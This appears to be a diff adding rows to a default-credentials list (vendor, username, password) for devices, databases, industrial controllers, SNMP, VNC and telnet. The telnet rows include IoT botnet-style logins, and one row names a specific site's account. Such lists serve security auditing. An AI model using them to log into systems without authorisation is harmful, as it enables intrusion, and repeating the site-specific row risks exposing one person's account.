+Oracle,SLIDE,SLIDEPW +Oracle,STARTER,STARTER +Oracle,STRAT_USER,STRAT_PASSWD +Oracle,SWPRO,SWPRO +Oracle,SWUSER,SWUSER +Oracle,SYMPA,SYMPA +Oracle,SYSADM,SYSADM +Oracle,sys,change_on_install +Oracle,SYS,CHANGE_ON_INSTALL +Oracle,SYS,D_SYSPW +Oracle,SYSMAN,oem_temp +Oracle,SYSMAN,OEM_TEMP +Oracle,sys,sys +Oracle,SYSTEM,D_SYSTPW +Oracle,system,manager +Oracle,SYSTEM,MANAGER +Oracle,system/manager,sys/change_on_install +Oracle,system,password +Oracle,system,security +Oracle,TAHITI,TAHITI +Oracle,TDOS_ICSAP,TDOS_ICSAP +Oracle,TESTPILOT,TESTPILOT +Oracle,TRACESRV,TRACE +Oracle,TRACESVR,TRACE +Oracle,TRAVEL,TRAVEL +Oracle,TSDEV,TSDEV +Oracle,TSUSER,TSUSER +Oracle,TURBINE,TURBINE +Oracle,ULTIMATE,ULTIMATE +Oracle,USER0,USER0 +Oracle,USER1,USER1 +Oracle,USER2,USER2 +Oracle,USER3,USER3 +Oracle,USER4,USER4 +Oracle,USER5,USER5 +Oracle,USER6,USER6 +Oracle,USER7,USER7 +Oracle,USER8,USER8 +Oracle,USER9,USER9 +Oracle,USER,USER +Oracle,UTLBSTATU,UTLESTAT +Oracle,VIDEOUSER,VIDEO USER +Oracle,VIF_DEVELOPER,VIF_DEV_PWD +Oracle,VIRUSER,VIRUSER +Oracle,VRR1,VRR1 +Oracle,WEBCAL01,WEBCAL01 +Oracle,webdb,webdb +Oracle,WEBDB,WEBDB +Oracle,weblogic,weblogic +Oracle,WEBREAD,WEBREAD +Oracle,WKSYS,WKSYS +Oracle,wlcsystem,wlcsystem +Oracle,wlpisystem,wlpisystem +Oracle,WWWUSER,WWWUSER +Oracle,WWW,WWW +Oracle,XPRT,XPRT +Orange,admin,admin +orange livebox4 (web),admin, +Orange,root,1234 +Osicom,debug,d.e.b.u.g +Osicom,d.e.b.u.g,User +Osicom,echo,echo +Osicom,echo,User +Osicom,guest,guest +Osicom,guest,User +Osicom,Manager,Admin +Osicom,Manager,Manager +Osicom,sysadm,Admin +Osicom,sysadm,sysadm +Osicom,write,private +OSMC,osmc,osmc +OTRS Inc.,root@localhost,root +Overland,Factory,56789 +Overland Storage,root,Password +Overland Tandberg,Admin,adm001 +Overland Tandberg,Guest,std001 +OvisLink Canada Inc.,root,root +OvisLink Canada Inc.,user,user +ovislink,root, +Pacific Micro Data,pmd, +Packard Bell,,bell9 +Packeteer,,touchpwd= +Palo Alto GlobalProtect Gateway,admin,admin +Panasonic,admin,1234 +Panasonic,admin,12345 +Panasonic,,1234 +Panasonic,, +Pandatel,admin,admin +Parallels,admin,setup +Parrot,,0000 +patrowl,admin,Bonjour1! +Patton,monitor,monitor +Patton,superuser,superuser +PBX,tech,nician +penril datability,,system +Pentagram,admin,password +Pentaoffice,,pento +PentaSafe,PSEAdmin,$secure$ +Perle,admin,superuser +pfSense,admin,pfsense +Pfsense (web),admin,pfsense +PheeNet,admin,admin +PheeNet,operator,1234 +PheeNet,root,default +Philips,admin,admin +phoenix,,admin +Phoenix v1.14,Administrator,admin +phpLiteAdmin,,admin +phpMyAdmin,root, +PHPReactor,core,phpreactor +phpTest,admin,1234 +phpTest,guest,guest +Pikatel,DSL,DSL +Pirelli,admin,admin +Pirelli,admin,microbusiness +Pirelli,admin,mu +Pirelli,admin,smallbusiness +Pirelli,user,password +Pivotal Software,guest,guest +PlainTree,,default.password +Planet,admin,1234 +planet,admin,admin +Planet,admin,epicrouter +Planet,,default +PLANET Technology Corp.,admin,[^_^] +PLANET Technology Corp.,admin,ISPMODE +Planex,admin,0 +Plesk,admin,setup +PokerTracker Software,postgres,dbpass +PokerTracker Software,postgres,svcPASS83 +Pollsafe,SMDR,SECONDARY +Polycom,administrator,* * # +Polycom,,ACCORD +Polycom,,admin +Polycom,, +Polycom,,x6zynd56 +Polycom,Polycom,456 +Polycom,Polycom,SpIp +Polycom VVX 500 (phone),Admin,456 +Polycom VVX 500 (phone),User,123 +postgres (postgres),admin,admin +postgres (postgres),admin,password +postgres (postgres),dcmadmin,passw0rd +postgres (postgres),postgres,123 +postgres (postgres),postgres,admin +postgres (postgres),postgres,amber +postgres (postgres),postgres,password +postgres (postgres),postgres,postgres +PostgreSQL,postgres, +Powerchute,pwrchute,pwrchute +POWERLOGIC,Administrator,Gateway +PowerShell-Empire/Starkiller,empireadmin,password123 +Prestige,admin,1234 +Prestigio,, +PrimeBase,Administrator, +Prime,dos,dos +Prime,fam,fam +Prime,guest1,guest +Prime,guest1,guest1 +Prime,guest,guest +Prime,mail,mail +Prime,maint,maint +Prime,mfd,mfd +Prime,netlink,netlink +Prime,primenet,primenet +Prime,primenet,primeos +Prime,primeos,prime +Prime,primeos,primeos +Prime,prime,prime +Prime,prime,primeos +Prime,primos_cs,prime +Prime,primos_cs,primos +Prime,system,prime +Prime,system,system +Prime,tele,tele +Prime,test,test +productvendor,username,password +Prolink,admin,password +Proliphix Thermostat (iot),admin,admin +Prolynx (Indoor Monitor),,002236 +Prolynx (Outdoor Station),admin,admin +Promise,admin,admin +Promise,engmode,hawk201 +Promise Technology,administrator,password +ProSoft Technology,,password +Prostar,,4321 +Protocraft,musi1921,Musi%1921 +Provision ISR,admin,123456 +Proxicast,,1234 +Proxim,, +Proxim,,public +PRTG,prtgadmin,prtgadmin +Psionteklogix,admin,admin +Psionteklogix,support,h179350 +ptcl,admin,admin +publicprivate (snmp),,private +publicprivate (snmp),,public +Pulse Secure,admin,password +Pyramid Computer,admin,admin +Pyramid Computer,admin,gnumpf +qBittorrent Web UI,admin,adminadmin +QDI,,lesarotl +QDI,,password +QDI,,QDI +QLogic,admin,password +QLogic,images,images +Q-Tec,Admin, +QualiTeam,master,master +Quantex,,teX1 +Quantex,,xljlbj +Quantum,, +Questra Corporation,guest,guest +Questra Corporation,questra,questra +Quest Software,TOAD,TOAD +Quintum Technologies Inc.,admin,admin +RabbitMQ,guest,guest +Radio Shack,,744 +Radio Shack,[MULTIPLE],744 +Radvision,admin, +Radvision,,MCUrv +Radware,lp,lp +Radware,radware,radware +Raidzone,,raidzone +Rainbow,,PASSWORD +Rainbow,,rainbow +Ramp Networks,wradmin,trancell +RapidStream,rsadmin, +Raritan,admin,raritan +Raritan Inc.,admin,raritan +Raritan Inc.,epiq_api,raritan +Raritan Inc.,web_api,sl33p30F00dumass! +raspberry Pi (ssh),pi,raspberry +RayTalk,root,root +RCA,,admin +ReCrystallize (server),admin,pw +Redcreek Communications,,1234 +Redcreek Communications,,private +RedHat,piranha,piranha +RedHat,piranha,q +RedHat (ssh),admin,admin +RedHat (ssh),,AMIAMI +RedHat (ssh),,AMIDECOD +RedHat (ssh),piranha,piranha +RedHat (ssh),piranha,q +Redis (redis),, +redline,admin,admin +reg.pnu.ac.ir,880175445,11223344 +Remedy,ARAdmin,AR#Admin# +Remedy,Demo, +remote-exploit,root,toor +Research,,Col2ogro2 +Research Machines,manager,changeme +Resumix,root,resumix +Ricoh,admin, +Ricoh,admin,password +Ricoh,,password +Ricoh,,sysadm +Ricoh MP (printer),supervisor, +Ricoh,sysadmin,password +Ricoh,sysadm,sysadm +RidgeWave,admin,admin +RiteCMS,admin,admin +Rittal,admin,admin +Rittal,cmc,cmc +Riverbed,Admin,password +Rizen,Admin,123qwe +RM,admin2,changeme +rm,administrator,password/changeme or secret +RM,admin,rmnetlm +RM,adminstrator,changeme +RM,,RM +RM,deskalt,password +RM,deskman,changeme +RM,desknorm,password +RM,deskres,password +RM,guest, +RM,replicator,replicator +RM,RMUser1,password +RM,setup,changeme +RM,teacher,password +RM,temp1,password +RM,topicalt,password +RM,topicnorm,password +RM,topicres,password +RNN,admin,demo +RoamAbout,admin,password +ROB-EX,Admin,Admin +RObiGVqUbQt,wVQxyQec,eomjbOBLLwbZeiKV +Rodopi,Rodopi,Rodopi +Roxy-wi,admin,admin +Roxy-wi,editor,editor +Roxy-wi,guest,guest +rPath,admin,password +RSA,admin,admin1234 +RSA,administrator,RSAAppliance +RSA,master,themaster01 +RuggedCom,Admin,admin +Ruijie,admin,admin +Saba,admin,admin +Safecom,admin,epicrouter +SafeNet Sentinel EMS (mssql),sa,DBA!sa@EMSDB123 +SAF Tehnika,administrator,d1scovery +SAF Tehnika,integrator,p1nacate +SAF Tehnika,monitor,monitor +SAF Tehnika,operator,col1ma +Sagem,admin,admin +SAGEM,admin,epicrouter +Sagem,Menara,Menara +Sagem,root,1234 +Samba,Any,Any +Sambar Technologies,admin, +Sambar Technologies,anonymous, +Sambar Technologies,billy-bob, +Sambar Technologies,ftp, +Sambar Technologies,guest,guest +Samsung,admin,password +Samsung,, +Samsung,,s!a@m#n$p%c +Samsung,public,public +samsung (web),admin,1111111 +samsung (web),admin,4321 +samsung (web),root,admin +Samuel Abels,user,password +SAP,admin,axis2 +SAP,Administrator,manage +SAP client EARLYWATCH,admin,Support +SAP,ctb_admin,sap123 +SAP,DDIC,19920706 +SAP,Developer,isdev +SAP,EARLYWATCH,SUPPORT +SAP,itsadmin,init +SAP,Replicator,iscopy +SAP,SAP*,06071992 +SAP,SAP*,7061992 +SAP,SAPCPIC,admin +SAP,SAPCPIC,ADMIN +SAP,SAP*,PASS +SAP,SAPR3,SAP +SAP,TMSADM, +SAP (web),admin,axis2 +SAP (web),Administrator,manage +SAP (web) client EARLYWATCH,admin,Support +SAP (web),ctb_admin,sap123 +SAP (web),DDIC,19920706 +SAP (web),Developer,isdev +SAP (web),EARLYWATCH,SUPPORT +SAP (web),itsadmin,init +SAP (web),Replicator,iscopy +SAP (web),SAP*,06071992 +SAP (web),SAP*,7061992 +SAP (web),SAPCPIC,admin +SAP (web),SAPCPIC,ADMIN +SAP (web),SAP*,PASS +SAP (web),SAPR3,SAP +SAP (web),TMSADM, +SAP (web),xmi_demo,sap123 +SAP,xmi_demo,sap123 +Schlage SMS (mssql),sa,SECAdmin1 +Schlage SMS (mssql),SMSAdmin,SECAdmin1 +Schneider Electric,Administrator,admin +Schneider Electric,,admin +Schneider Electric,ntpupdate,ntpupdate +Schneider Electric,USER,USER +Schneider M340(FTP),sysdiag,factorycast@schneider +Schneider M340(Web),USER,USER +Schneider Premium(FTP),sysdiag,factorycast@schneider +Schneider Premium(WEB),USER,USER +schneider,USER,USER +Scientific Atlanta,admin,w2402 +Scrutinizer (MySQL),scrutremote,admin +Seagate,admin,admin +Seagull Scientific,ADMIN,admin +Seagull Scientific,USER,USER +Seclore,root,changeonfirstlogin +Seclore,sa,changeonfirstlogin +Secure Computing,admin, +Securicor3NET,manager,friend +securstar,admin,rainbow +SedSystems,admin,admin +Semaphore,DESQUETOP, +Semaphore,DSA, +Semaphore,DS, +Semaphore,PHANTOM, +Sempre,admin,admin +Senao,admin, +seninleyimben,admin,admin +sentry360 (web),admin,1234 +Sercom,admin,admin +Server Technology,ADMN,admn +Server Technology,GEN1,gen1 +Server Technology,GEN2,gen2 +Seyeon Technology,root,root +Sharp,admin,admin +Sharp,Administrator,admin +Sharp,admin,Sharp +sharp,, +Sharp,,sysadm +SHIELDeye,admin,123456 +Shiva,admin,hello +Shiva,guest, +Shiva,hello,hello +Shiva,root, +ShoreTel,Admin,admin1 +Shoretel,admin,changeme +Shuttle,admin, +Shuttle,,Spacve +Siemens,31994,31994 +Siemens,admin,admin +Siemens,admin, +Siemens,admin,hagpolm1 +Siemens,admin,pwp +Siemens,basisk,basisk +Siemens,,0 +Siemens,,123456 +Siemens,,admin +Siemens,, +Siemens,,gubed +Siemens,,SKY_FOX +Siemens Corp,18140815,18140815 +Siemens Corp,31994,31994 +Siemens Corp,admin, +Siemens Corp,admin,pwp +Siemens Corp,,SKY_FOX +Siemens Corp,,uboot +Siemens Corp,eng,engineer +Siemens Corp,op,op +Siemens Corp,op,operator +Siemens Corp,poll,poll +Siemens Corp,poll,tech +Siemens Corp,su,super +Siemens Corp,sysadmin,sysadmin +Siemens Corp,system,field +Siemens Corp,system,system +Siemens Corp,tech,tech +Siemens Corp,WinCCAdmin,2WSXcde +Siemens Corp,WinCCConnect,2WSXcder +Siemens,eng,engineer +Siemens,op,op +Siemens,op,operator +Siemens,poll,tech +Siemens S7-1200(Web),admin, +Siemens,superuser,admin +Siemens,su,super +Siemens,sysadmin,sysadmin +Siemens,tech,field +Siemens,tech,tech +siemens (web),admin,admin +Sierra Wireless,user,12345 +Sigma,admin,admin +Signamax,admin,admin +Siips,Administrator,ganteng +Silex Technology,access, +Silex Technology,root, +Silicon Graphics,4Dgifts,4Dgifts +Silicon Graphics,4Dgifts, +Silicon Graphics,6.x, +Silicon Graphics,demos, +Silicon Graphics,Ezsetup, +Silicon Graphics,field,field +Silicon Graphics,guest, +Silicon Graphics,lp, +Silicon Graphics,OutOfBox, +Silicon Graphics,tour,tour +Silicon Graphics,tutor, +Silicon Graphics,tutor,tutor +Silvercrest,admin,admin +Siqura,Admin,1234 +sitara,root, +Sitecom,admin,admin +Sitecom,admin,password +Sitecom,,damin +Sitecom,,sitecom +Sitecore Corporation,admin,b +Sitecore Corporation,Audrey,a +Sitecore Corporation,Bill,b +Sitecore Corporation,Denny,d +Sitecore Corporation,Lonnie,l +Sitecore Corporation,Minnie,m +Site Interactive,admin,pass +SKF @ptitude Analyst (mssql),sa,skf_admin1 +SMA America,,sma +smartBridges,admin,public +SmartSwitch,admin, +SMC,admin,admin +SMC,admin,barricade +SMC,Admin,Barricade +SMC,admin, +SMC,Administrator,smcadmin +SMC,admin,smcadmin +SMC,,0000 +SMC,, +SMC,,smcadmin +SMC,cusadmin,highspeed +SMC,default,WLAN_AP +SMC,mso,w0rkplac3rul3s +SMC,smc,smcadmin +Snap Appliance,admin,admin +Snapgear,root,admin +SnapGear,root,default +SNMP (snmp),,0 +SNMP (snmp),,0392a0 +SNMP (snmp),,1234 +SNMP (snmp),,2read +SNMP (snmp),,4changes +SNMP (snmp),,access +SNMP (snmp),,adm +SNMP (snmp),,admin +SNMP (snmp),,Admin +SNMP (snmp),,agent +SNMP (snmp),,agent_steal +SNMP (snmp),,all +SNMP (snmp),,ANYCOM +SNMP (snmp),,apc +SNMP (snmp),,bintec +SNMP (snmp),, +SNMP (snmp),,blue +SNMP (snmp),,c +SNMP (snmp),,C0de +SNMP (snmp),,cable +SNMP (snmp),,canon_admin +SNMP (snmp),,cc +SNMP (snmp),,cisco +SNMP (snmp),,CISCO +SNMP (snmp),,community +SNMP (snmp),,core +SNMP (snmp),,CR52401 +SNMP (snmp),,debug +SNMP (snmp),,default +SNMP (snmp),,dilbert +SNMP (snmp),,enable +SNMP (snmp),,field +SNMP (snmp),,freekevin +SNMP (snmp),,fubar +SNMP (snmp),,guest +SNMP (snmp),,hello +SNMP (snmp),,hp_admin +SNMP (snmp),,ibm +SNMP (snmp),,IBM +SNMP (snmp),,ilmi +SNMP (snmp),,ILMI +SNMP (snmp),,intermec +SNMP (snmp),,Intermec +SNMP (snmp),,internal +SNMP (snmp),,l2 +SNMP (snmp),,l3 +SNMP (snmp),,manager +SNMP (snmp),,mngt +SNMP (snmp),,monitor +SNMP (snmp),,netman +SNMP (snmp),,network +SNMP (snmp),,NoGaH$@! +SNMP (snmp),,openview +SNMP (snmp),,OrigEquipMfr +SNMP (snmp),,pass +SNMP (snmp),,password +SNMP (snmp),,pr1v4t3 +SNMP (snmp),,private +SNMP (snmp),,Private +SNMP (snmp),,PRIVATE +SNMP (snmp),,proxy +SNMP (snmp),,publ1c +SNMP (snmp),,public +SNMP (snmp),,Public +SNMP (snmp),,PUBLIC +SNMP (snmp),,read +SNMP (snmp),,readwrite +SNMP (snmp),,red +SNMP (snmp),,regional +SNMP (snmp),,rmon +SNMP (snmp),,rmon_admin +SNMP (snmp),,ro +SNMP (snmp),,root +SNMP (snmp),,router +SNMP (snmp),,rw +SNMP (snmp),,rwa +SNMP (snmp),,s!a@m#n$p%c +SNMP (snmp),,san +SNMP (snmp),,sanfran +SNMP (snmp),,scotty +SNMP (snmp),,secret +SNMP (snmp),,Secret +SNMP (snmp),,SECRET +SNMP (snmp),,security +SNMP (snmp),,Security +SNMP (snmp),,SECURITY +SNMP (snmp),,seri +SNMP (snmp),,snmp +SNMP (snmp),,SNMP +SNMP (snmp),,snmpd +SNMP (snmp),,snmptrap +SNMP (snmp),,SNMP_trap +SNMP (snmp),,solaris +SNMP (snmp),,sun +SNMP (snmp),,SUN +SNMP (snmp),,superuser +SNMP (snmp),,switch +SNMP (snmp),,Switch +SNMP (snmp),,SWITCH +SNMP (snmp),,system +SNMP (snmp),,System +SNMP (snmp),,SYSTEM +SNMP (snmp),,tech +SNMP (snmp),,test +SNMP (snmp),,TEST +SNMP (snmp),,test2 +SNMP (snmp),,tiv0li +SNMP (snmp),,tivoli +SNMP (snmp),,trap +SNMP (snmp),,world +SNMP (snmp),,write +SNMP (snmp),,xyzzy +SNMP (snmp),,yellow +Snom,admi, +Snom,Administrator,0000 +Software AG,Administrator,manage +Softwarehouse,manager,manager +SolarWinds,LocalAdministrator,#l@$ak#.lk;0@P +SolarWinds,whd,whd +Solution 6,aaa,often blank +Solwise,root,same as webui pwd +SonarQube (web),admin,admin +SonicWALL,admin,password +Sonic-X,root,admin +Sonus,admin,Sonus12345 +Sony,admin,admin +Sony,,4x 'Enter' button +Sony Ericsson,,0000 +SOPHIA (Schweiz),admin,Protector +SOPHIA (Schweiz),root,root +Sorenson,,admin +Sourcecodester,admin,admin +Sourcefire,admin,password +Sourcefire,root,password +Sovereign Hill,Admin,shs +Sparklan,admin,admin +Speco Technologies IP Camera (camera),admin,1234 +speco (web),admin,1234 +Spectra Logic,administrator, +Spectra Logic,operator, +SpeedStream,admin,admin +SpeedStream,Administrator,admin +SpeedStream,,admin +SpeedStream,,adminttd +SpeedXess,,speedxess +Sphairon,admin,passwort +Spider Systems,,hello +Spike,enable, +SplendidCRM (mssql),sa,splendidcrm2005 +Splunk,admin,changeme +sprint,self,system +Ssangyoung,,2501 +SSA,SSA,SSA +ssh (ssh),nasadmin,nasadmin +ssh (ssh),root,7ujMko0admin +ssh (ssh),root,ascend +Stan Ozier,admin, +stardot (web),admin,admin +stratacom,stratacom,stratauser +Stratitec,root,ahetzip8 +stuccoboy,stuccoboy,100198 +Sun,admin,admin +Sun Microsystems,root,changeme +Sun,root,changeme +SUN,root,sun123 +Sun,root,t00lk1t +Sun,ssp,ssp +Supercook,admin,AlpheusDigital1010 +Supercook,super,super +Supermicro,ADMIN,admin +SuperMicro,,ksdjfg934t +Super Micro Computer,ADMIN,ADMIN +Supermicro (web),ADMIN,ADMIN +Surecom,admin,admin +Surecom,admin,surecom +SuSE GmbH,root,root +Sweex,admin,1234 +Sweex,admin,epicrouter +Sweex,,admin +Sweex,, +Sweex,,blank +Sweex,,mysweex +Sweex,rdc123,rdc123 +Sweex,sweex,mysweex +SWEEX,sweex,mysweex +Swissvoice,target,password +Syabas Technology,ftpuser,1234 +Syabas Technology,nmt,1234 +Sybase,12.x, +Sybase,DBA,SQL +Sybase,jagadmin, +Sybase,sa, +Sybase,sa,sasasa +Sylvania,,8888 +Symantec,admin, +Symantec,admin,symantec +Symantec,,symantec +Symantec,root,brightmail +Symbol,admin,symbol +Symbol,,Symbol +Symbol,Symbol,Symbol +Symbol Technologies,admin,superuser +Symmetricom,guest,truetime +Symmetricom,operator,mercury +Synology Inc,admin, +SysKonnect,default.password, +SysMaster,admin,12345 +System/32,install,secret +Tandberg,admin, +Tandberg,Admin, +Tandberg,admin,TANDBERG +Tandberg,,10023 +Tandberg,,GWrv +Tandberg,,TANDBERG +Tandberg,root,TANDBERG +Tandem,super.super, +Tandem,super.super,master +Tasman,Tasman,Tasmannet +T-Com,,0 +T-Com,,123456 +T-Comfort,Administrator, +T-com,veda,12871 +TeamCity 9 Guest (web),, +Team Xodus,xbox,xbox +technicolor (ssh),admin,admin +technology,root, +Tegile,admin,tegile +Teklogix,Administrator, +Telappliant,admin,1234 +Telco Systems,telco,telco +Telebit,setup,setup +Telebit,snmp,nopasswd +telecom,operator, +Teledat,admin,1234 +Telelec,eagle,eagle +Teleopti WFM (web),admin@company.com,admin +Telestream Vantage (mssql),sa,vantage12! +Teletronics,admin,1234 +Telewell,admin,admin +Telewell,admin,password +Telindus,admin,admin +Telindus,, +Tellabs,root,admin_1 +Tellabs,tellabs,tellabs#1 +telnet (telnet),666666,666666 +telnet (telnet),888888,888888 +telnet (telnet),admin,1111 +telnet (telnet),admin,1111111 +telnet (telnet),admin,1234 +telnet (telnet),admin,12345 +telnet (telnet),admin,123456 +telnet (telnet),admin1,password +telnet (telnet),admin,54321 +telnet (telnet),admin,7ujMko0admin +telnet (telnet),admin,admin +telnet (telnet),admin,admin1234 +telnet (telnet),admin, +telnet (telnet),administrator,1234 +telnet (telnet),Administrator,admin +telnet (telnet),admin,meinsm +telnet (telnet),admin,pass +telnet (telnet),admin,password +telnet (telnet),admin,smcadmin +telnet (telnet),guest,12345 +telnet (telnet),guest,guest +telnet (telnet),mother,fucker +telnet (telnet),root,0 +telnet (telnet),root,1111 +telnet (telnet),root,1234 +telnet (telnet),root,12345 +telnet (telnet),root,123456 +telnet (telnet),root,54321 +telnet (telnet),root,666666 +telnet (telnet),root,7ujMko0admin +telnet (telnet),root,7ujMko0vizxv +telnet (telnet),root,888888 +telnet (telnet),root,admin +telnet (telnet),root,anko +telnet (telnet),root, +telnet (telnet),root,default +telnet (telnet),root,dreambox +telnet (telnet),root,hi3518 +telnet (telnet),root,ikwb +telnet (telnet),root,juantech +telnet (telnet),root,jvbzd +telnet (telnet),root,klv123 +telnet (telnet),root,klv1234 +telnet (telnet),root,pass +telnet (telnet),root,password +telnet (telnet),root,realtek +telnet (telnet),root,root +telnet (telnet),root,system +telnet (telnet),root,user +telnet (telnet),root,vizxv +telnet (telnet),root,xc3511 +telnet (telnet),root,xmhdipc +telnet (telnet),root,zlxx. +telnet (telnet),root,Zte521 +telnet (telnet),service,service +telnet (telnet),supervisor,supervisor +telnet (telnet),support,support +telnet (telnet),tech,tech +telnet (telnet),ubnt,ubnt +telnet (telnet),user,user +TELTRONIC S.A.U.,admin,tetra +Telus,(created),telus00 +Telus,(created),telus99 +Terayon,admin,password +Terayon,, +tert,james,james +TexBox,,123 +TextPortal,god1,12345 +TextPortal,god2,12345 +Thecus Tech,admin,admin +TheHive,admin@thehive.local,secret +TheHive,thehive@thehive.local,thehive1234 +Thomson,admin,admin +Thomson,admin,password +Thomson,,admin +thomson (ssh),admin,admin +thomson (ssh),admin,password +Tiara Networks,,tiara +Tiara,tiara,tiaranet +TIBCO,admin,admin +TIBCO,admin,changeit +TimeForce (mssql),sa,dr8gedog +TimeForce (mssql),sa,Dr8gedog +TimeTools,admin,admin +Tim Schaab,theman,changeit +Tiny,,Tiny +Tinys,,tiny +Tinys,,Tiny +Tiptel (IP Phones),admin,admin +Tiptel (IP Phones),user,user +TMC,,BIGO +Topcom,admin,admin +TopLayer,siteadmin,toplayer +topnet (web),topadmin,topadmin +topsec,superman,talent +Toshiba,admin,123456 +Toshiba,Admin,123456 +Toshiba,,24Banc81 +Toshiba,, +Toshiba,,Toshiba +Toshiba,,toshy99 +Toshiba,super,superpass +TOTOLINK,onlime_r,12345 +TOTOLINK,root,12345 +TP Link,admin,admin +Trend Micro,admin,admin +Trend Micro,admin,imsa7.0 +TrendMicro,admin,imss7.0 +Trend Micro,root,trendimsa1.0 +TrendNET,admin,password +TRENDnet Internet Camera (webcam),admin,admin +Trintech,t3admin,Trintech +Tripp Lite,root,TrippLite +Triumph-Adler,admin,0 +Troy,admin,extendnet +Tsunami,managers,managers +Tumbleweed,Admin,SECRET123 +TVT System,,enter +TVT System,craft, +TYPO3,admin,password +Typo3 Association,admin,password +TYPO3,,joh316 +Ubiquiti EdgeOS (web),ubnt,ubnt +ubiquiti (ssh),admin,admin +ubiquiti (ssh),root,ubnt +ubiquiti (ssh),ubnt,ubnt +Ucopia,admin,bhu85tgb +Unex,,password +UNEX,,password +Unidesk,Administrator,Unidesk1 +Unify,,123456 +Union,root,root +Unisys,ADMINISTRATOR,ADMINISTRATOR +Unisys,HTTP,HTTP +Unisys,NAU,NAU +United Technologies Corporation,admin,1234 +UNIVIEW,admin,123456 +UNIX,adm,adm +UNIX,adm, +UNIX,admin,admin +UNIX,administrator,administrator +UNIX,administrator, +UNIX,anon,anon +UNIX,bbs,bbs +UNIX,bbs, +UNIX,bin,sys +UNIX,checkfs,checkfs +UNIX,checkfsys,checkfsys +UNIX,checksys,checksys +UNIX,daemon, +UNIX,daemon,daemon +UNIX,demo, +UNIX,demo,demo +UNIX,demos, +UNIX,demos,demos +UNIX,dni, +UNIX,dni,dni +UNIX,fal, +UNIX,fal,fal +UNIX,fax, +UNIX,fax,fax +UNIX,ftp, +UNIX,ftp,ftp +UNIX,games, +UNIX,games,games +UNIX,gopher,gopher +UNIX,gropher, +UNIX,guest, +UNIX,guest,guest +UNIX,guest,guestgue +UNIX,halt, +UNIX,halt,halt +UNIX,informix,informix +UNIX,install,install +UNIX,lpadmin,lpadmin +UNIX,lpadm,lpadm +UNIX,lp,bin +UNIX,lp, +UNIX,lp,lineprin +UNIX,lp,lp +UNIX,lynx, +UNIX,lynx,lynx +UNIX,mail, +UNIX,mail,mail +UNIX,man, +UNIX,man,man +UNIX,me, +UNIX,me,me +UNIX,mountfs,mountfs +UNIX,mountfsys,mountfsys +UNIX,mountsys,mountsys +UNIX,news, +UNIX,news,news +UNIX,nobody, +UNIX,nobody,nobody +UNIX,nuucp, +UNIX,operator, +UNIX,operator,operator +UNIX,oracle, +UNIX,postmaster, +UNIX,postmaster,postmast +UNIX,powerdown,powerdown +UNIX,rje,rje +UNIX,root, +UNIX,root,hp +UNIX,root,root +UNIX,service,smile +UNIX,setup, +UNIX,setup,setup +UNIX,shutdown, +UNIX,shutdown,shutdown +UNIX,sync, +UNIX,sync,sync +UNIX,sysadm,admin +UNIX,sysadmin,sysadmin +UNIX,sysadm,sysadm +UNIX,sys,bin +UNIX,sysbin,sysbin +UNIX,sys,sys +UNIX,sys,system +UNIX,system_admin, +UNIX,system_admin,system_admin +UNIX,trouble,trouble +UNIX,umountfs,umountfs +UNIX,umountfsys,umountfsys +UNIX,umountsys,umountsys +UNIX,unix,unix +UNIX,user,user +UNIX,uucpadm,uucpadm +UNIX,uucp,uucp +UNIX,web, +UNIX,webmaster, +UNIX,webmaster,webmaster +UNIX,web,web +UNIX,www, +UNIX,www,www +Unknown,,password +Unknown,operator,operator +Unknown,overseer,overseer +Unknown,test,test +U.S. Robotics,admin,admin +USRobotics,admin,admin +U.S. Robotics,admin, +UsRobotics,Any,12345 +U.S. Robotics,Any,12345 +U.S. Robotics,,12345 +U.S. Robotics,,admin +U.S. Robotics,,amber +U.S. Robotics,root,12345 +U.S. Robotics,root,admin +U.S. Robotics,support,support +UTC FCWnx (mssql),sa,SecurityMaster08 +UT Lexar,lexar, +Utstar,admin,utstar +UTStarcom,dbase,dbase +UTStarcom,field,field +UTStarcom,guru,*3noguru +UTStarcom,snmp,snmp +vacron (web),admin,admin +Vagrant,vagrant,vagrant +Various,root,admin +VASCO,admin, +VBrick Systems,admin,admin +vectr,admin,11_ThisIsTheFirstPassword_11 +Veramark,admin,password +Verifone,,166816 +Verilink,, +Veritas,admin,password +Verity,admin,admin +Verizon,admin,password +vertex,root,vertex25 +Vextrec Technology,,Vextrex +Video Insight (mssql),sa,V4in$ight +videoiq (web),supervisor,supervisor +Video Web Server (webcam),admin,admin +VieNuke,admin,admin +Vina Technologies,, +Virtual Programming,admin,admin +Virtual Programming,vpasp,vpasp +Visa VAP,root,QNX +Visual Networks,admin,visual +vnc (vnc),,1234 +vnc (vnc),,123456 +vnc (vnc),,1988 +vnc (vnc),,admin +vnc (vnc),,ADMIN +vnc (vnc),,Admin#1 +vnc (vnc),,Administrator +vnc (vnc),,Amx1234! +vnc (vnc),,AVStumpfl +vnc (vnc),,beijer +vnc (vnc),,default +vnc (vnc),,EltakoFVS +vnc (vnc),,elux +vnc (vnc),,eyevis +vnc (vnc),,FELDTECH_VNC +vnc (vnc),,fidel123 +vnc (vnc),,hapero +vnc (vnc),,instrument +vnc (vnc),,m9ff.QW +vnc (vnc),,maryland-dstar +vnc (vnc),,muster +vnc (vnc),,pass +vnc (vnc),,pass1 +vnc (vnc),,pass2 +vnc (vnc),,passwd11 +vnc (vnc),,password +vnc (vnc),,Passwort +vnc (vnc),,protech +vnc (vnc),,qwasyx21 +vnc (vnc),,raspberry +vnc (vnc),,ripnas +vnc (vnc),,sigmatek +vnc (vnc),,solarfocus +vnc (vnc),,TOUCHLON +vnc (vnc),,user +vnc (vnc),,visam +vnc (vnc),,Vision2 +vnc (vnc),,vnc +vnc (vnc),,vnc_pcc +vnc (vnc),,Wyse +vnc (vnc),,Wyse#123 +vnc (vnc),,yesco +Vobis,,merlin +VoiceGenie Technologies,pw,pw +VoiceObjects Germany,voadmin,manager +Vonage,user,user +VPASP,admin,admin +VPASP,vpasp,vpasp +VxWorks,admin,admin +VxWorks,guest,guest +WAAV,admin,waav +Wanadoo,admin,admin +Wanco,,ABCD +Wanco,,Guest +Wanco,,NTCIP +Wanco,,Public +Wang,CSG,SESAME +warraCorp,pepino,pepino +WatchGuard,admin,admin +Watchguard,admin, +WatchGuard,admin,readwrite +Watchguard,,wg +WatchGuard,,wg +WatchGuard,status,readonly +Watchguard,user,pass +weblogic,system,weblogic +Weblogic (web),EXAMPLES,EXAMPLES +Weblogic (web),monitor,password +Weblogic (web),operator,password +Weblogic (web),operator,weblogic +Weblogic (web),PUBLIC,PUBLIC +Weblogic (web),system,manager +Weblogic (web),system,Passw0rd +Weblogic (web),system,password +Weblogic 